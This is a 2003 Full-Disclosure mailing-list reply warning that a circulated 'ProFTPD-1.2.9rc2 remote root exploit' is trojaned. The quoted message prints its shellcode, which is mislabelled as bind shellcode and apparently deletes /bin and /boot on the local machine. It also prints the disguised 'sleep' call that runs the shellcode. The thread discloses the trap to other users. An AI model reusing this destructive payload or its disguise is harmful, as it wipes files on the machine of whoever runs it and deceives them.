Re: ProFTPD-1.2.9rc2 remote root exploit

[Andreas Gietl <a.gietl () e-admin de>]

On Friday 24 October 2003 16:20, Robert Jaroszuk wrote:

yeah, it deletes /bin/* boot/* and few other files.

> On Fri, 24 Oct 2003, Andreas Gietl wrote:
>
> ; On Friday 24 October 2003 14:22, Jean-Kevin Grosnakeur wrote:
> ;
> ; this seems to delete sth on the local harddisk. anybody else seeing this
> ; effect?
>
> Yea, something like that.
>
> /* x86 bind shellcode */
> char sc[]=
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
>
> [ cut ]
>
>   /* connect to the bindshell */
>   printf("Trying to connect, please wait...\n");
>   void(*sleep)()=(void*)sc;sleep(5);
>
> This exploit tries to run shellcode on local machine.
> Probably smth evil in this shellcode:

-- 
e-admin internet gmbh
Andreas Gietl                                            tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      fax +49 (0)1805/39160 - 29104
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html